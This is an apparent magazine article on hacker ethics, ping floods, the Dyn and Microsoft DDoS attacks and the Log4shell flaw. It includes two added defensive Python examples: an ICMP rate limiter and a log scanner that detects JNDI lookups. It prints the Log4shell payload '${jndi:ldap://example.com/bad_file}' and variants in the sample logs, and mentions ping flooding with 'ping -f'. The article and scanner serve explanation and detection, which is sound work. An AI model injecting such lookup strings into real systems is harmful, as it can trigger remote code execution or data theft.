Modern hacking, ethics and statistics
Read about the largest DDoS in history and how honing your hacking skills might help you prevent the next one…
A gerund and an infinitive walk into the Linux kernel. They were hacking to learn. An awful adaptation of a (drinking to forget) joke, but a reasonable opener. An incredibly useful maxim from long ago hacker lore is “don’t learn to hack, hack to learn”. It’s worth taking some time to marinate on this message.
For example, if you search Google for “how to hack” or worse “how to hack gmail”, we can pretty much guarantee you won’t find any useful information. Indeed, you’ll probably find all sorts of spam and phishing links that we wouldn’t recommend touching, even with JavaScript turned off. This isn’t because search engines are producing increasingly bad search results, but because hackers and advertisers know the kinds of intellects who are searching for these terms. And unfortunately they know how to monetise them, too.
Yet there are plenty of good resources where you can learn network reconnaissance, penetration testing and even phishing techniques. Sites like https://tryhackme.com, for example, will teach you these skills with a view to learning how to defend against them. TryHackMe makes the learning process fun by gamifying tutorials, in some cases giving you VMs to download and break into. There are lessons, labs and competitions that will help you learn everything from Metasploit to Maltego. A big part of hacker culture is Capture The Flag (CTF) challenges. You might remember this one from the playground, or later from first-person shooters such as Unreal Tournament. The traditional idea is that teams compete to try and capture the flags from opposing teams’ bases and return them to their own. But the hacker version just involves finding flags (sometimes just empty files called flag, sometimes more interesting items) hidden by whoever set the challenge.
Open the floodgates
We started with the ping of death, so let’s end with the idea of a ping flood. Instead of a single malformed packet, a huge number of legitimately sized ones are transmitted. The idea is to overwhelm the target machine by sending more pings than it can handle. Both the Ping of Death and ping flooding are part of the broad category known as Denial of Service (DoS) attacks.
On Linux, some features of the ping command are only available when it’s run as root. One such example is the -f (flood) option, which when used on its own sends echo requests as quickly as possible. In favourable circumstances (the attacker has significantly more bandwidth than the defender, and the defender has no DoS-preventing firewall), it’s possible for one machine to cripple another this way. It’s more common, however, for an attacker to use several hosts to send the pings, making this a Distributed Denial of Service (DDoS) attack. Ping floods are defended against by most routers, as are SYN floods and similar attacks: all of these are detectable by a garden-variety packet-filtering stack.
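The per-source rate limit that a packet-filtering firewall applies to blunt a ping flood, as an added example that is not from the article: a token bucket is kept for each source address, echo requests are accepted while tokens remain and dropped otherwise. The packet records, addresses, rate and burst values are all constructed for the demonstration.

```python
"""Per-source rate limiting of ICMP echo requests, the check a
packet-filtering firewall applies against ping floods.
Added example, not from the article; all records are constructed."""
from collections import defaultdict
from dataclasses import dataclass

ECHO_REQUEST = 8  # ICMP type 8; type 0 (echo reply) is not limited

# Constructed records as (timestamp in milliseconds, source IP, ICMP type).
# 192.0.2.10 pings at a polite 2/s; 198.51.100.7 sends 500 requests in one second.
SAMPLE_PACKETS = (
    [(i * 500, "192.0.2.10", ECHO_REQUEST) for i in range(6)]
    + [(i * 2, "198.51.100.7", ECHO_REQUEST) for i in range(500)]
    + [(1000, "192.0.2.10", 0)]
)

@dataclass
class TokenBucket:
    """Token bucket kept in thousandths of a token so the arithmetic is exact."""
    rate: int          # tokens added per second
    burst: int         # maximum tokens the bucket holds
    tokens: int = 0    # current level, in milli-tokens
    last_ms: int = 0   # timestamp of the previous packet from this source

    def allow(self, now_ms: int) -> bool:
        refill = (now_ms - self.last_ms) * self.rate  # ms * tokens/s = milli-tokens
        self.tokens = min(self.burst * 1000, self.tokens + refill)
        self.last_ms = now_ms
        if self.tokens >= 1000:
            self.tokens -= 1000
            return True
        return False

def rate_limit_pings(packets, rate=5, burst=10):
    """Return {source: {"accepted": n, "dropped": n}} for echo requests only."""
    buckets = {}
    counts = defaultdict(lambda: {"accepted": 0, "dropped": 0})
    for ts_ms, src, icmp_type in sorted(packets):
        if icmp_type != ECHO_REQUEST:
            continue
        if src not in buckets:  # a new source starts with a full bucket
            buckets[src] = TokenBucket(rate, burst, tokens=burst * 1000, last_ms=ts_ms)
        counts[src]["accepted" if buckets[src].allow(ts_ms) else "dropped"] += 1
    return dict(counts)

if __name__ == "__main__":
    for src, c in rate_limit_pings(SAMPLE_PACKETS).items():
        print(f"{src}: accepted={c['accepted']} dropped={c['dropped']}")
```

With a 5/s rate and a burst of 10, the polite source loses nothing while the flooding source gets its first ten packets through and then only one every 200ms.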
The actual DDoS-ing is typically done by a botnet under the attacker’s control. Cybercrime groups may rent out sections of a hoard of zombie machines that they’ve curated, or they may use that hoard directly. Such attacks have involved a huge amount of bandwidth. In 2016 DNS provider Dyn was taken offline (making many popular websites inaccessible) as a result of the Mirai malware, which mostly infects IoT devices using default credentials. The total bandwidth of this attack was estimated to be in the region of 1.2Tbps. Security commentators of the era lamented that the net had been crippled by a telnet scanner and 36 passwords. In November 2021, Microsoft revealed it had thwarted the largest DDoS attack in history, topping out at 3.47Tbps. That’s 3,000 times more data than gigabit LAN. A UDP reflection attack was to blame, but there are plenty of other types of DDoS attacks that are more sophisticated.
The Log4shell vulnerability took advantage of unsanitised input and at worst enabled remote code execution. All an attacker had to do was cause a carefully crafted message, which looked something like ${jndi:ldap://example.com/bad_file}, to be written to a log file. Like Bash, Log4j performs string substitution on expressions in curly brackets. In the right circumstances, the contents of /bad_file might be executed immediately on the server. Or the log may be processed on another server and /bad_file executed there later. Even if code execution is prevented, an attacker can still cause the vulnerable machine to send data (such as environment variables or form contents) to their machine.
False sense of security
Here we’re abusing the Java Naming and Directory Interface’s (JNDI) ability to fetch resources via LDAP, but other protocols can be used too. As a result, a number of related flaws were discovered soon after the first, and a number of incomplete mitigations were circulated initially, creating a very false sense of security. Once compromised, machines were enrolled in botnets, crippled with ransomware, or became unwitting cryptocurrency miners.
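The defender’s side of the two preceding passages, as an added example that is not from the article: a scanner that finds the JNDI lookup expression in log lines and reports which protocol and host a vulnerable Log4j would have contacted. The log lines are constructed (example.com is the article’s placeholder), and only the plain form shown above is matched; the nested-lookup obfuscations that circulated after disclosure need normalising before a check like this is applied.

```python
"""Find the JNDI lookup pattern behind Log4shell in log lines and report the
outbound connection a vulnerable Log4j would have attempted.
Added example, not from the article; the sample log lines are constructed."""
import re
from urllib.parse import urlsplit

# Plain form from the article, matched case-insensitively: ${jndi:<scheme>:<rest>}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):(?P<rest>[^}]*)\}", re.IGNORECASE)

# Constructed sample: web-server access log lines and game-server chat lines.
SAMPLE_LOG = """\
198.51.100.7 - - "GET /login HTTP/1.1" 200 "User-Agent: ${jndi:ldap://example.com/bad_file}"
203.0.113.5 - - "GET /index.html HTTP/1.1" 200 "User-Agent: Mozilla/5.0"
[chat] <player1> hello ${JNDI:LDAPS://example.com:1389/x}
[chat] <player2> price is ${price} today
198.51.100.7 - - "GET /?q=${jndi:rmi://example.com/obj} HTTP/1.1" 404 "-"
"""

def find_jndi_lookups(text):
    """Return one dict per match: line number, scheme, target host/port, raw text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in JNDI_LOOKUP.finditer(line):
            scheme = m.group(1).lower()
            # Rebuild "<scheme>:<rest>" as a URL so urlsplit separates host and port.
            parts = urlsplit(f"{scheme}:{m.group('rest')}")
            hits.append({
                "line": lineno,
                "scheme": scheme,
                "host": parts.hostname,   # None if the lookup carries no host
                "port": parts.port,       # None when the scheme default applies
                "raw": m.group(0),
            })
    return hits

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['host']}:{hit['port']}  {hit['raw']}")
```

The ordinary ${price} expression on line 4 is ignored; only lookups naming jndi are flagged.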
It’s interesting that the Dyn attack has been attributed (though not conclusively – all we really know is that in 2017 three individuals aged 20-21 entered guilty pleas relating to “significant cyber attacks”) to disgruntled Minecraft players, and so too was Log4j. Indeed, to exploit Log4j on a vulnerable Minecraft server, all you needed to do was post the code snippet above into the chat. From there it would be dutifully processed by Log4j and, if various conditions were met, the attacker would be able to execute code.
And there concludes our perennial hacker special. As usual we’ve barely scratched the surface of the subject matter, and indeed dealt with only a fraction of the fantastic selection of tooling within Parrot. But hopefully you’ve learned something. We certainly have. Many readers will remember with fondness the old Drupal-based Linuxformat.com site. Quite how this stayed up for so long, and more importantly how we managed to avoid invoicing for so long (13 years to be precise), is a puzzle for the ages. As we’re fans of digital history here, we have most of that site archived in a virtual machine. And since we’re talking about hacker toolkits today we figured we’d have a go at compromising said virtual machine. Nmap revealed that our venerable, vulnerable, virtual machine was running the following ancient software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1 and Subversion (no version number detected).
But try as we might, none of our exploits worked. We used ZAP (the Zed Attack Proxy) from OWASP (the Open Web Application Security Project, https://owasp.org) to try and attack the old archive forms, but nothing. If you’re interested, ZAP works by setting up a person-in-the-middle proxy that can manipulate requests as they’re sent to the web server under investigation, and inspect the responses.
We also tried Metasploit, which would be a whole feature (or even a bookazine) in itself. But the ghost of our machine, it seems, was as resilient as its former self. Ideas, anyone? Oh and one more thing. We ask politely that you don’t try and pentest our new website, because you will fail and Future’s Operations Team will hunt you down.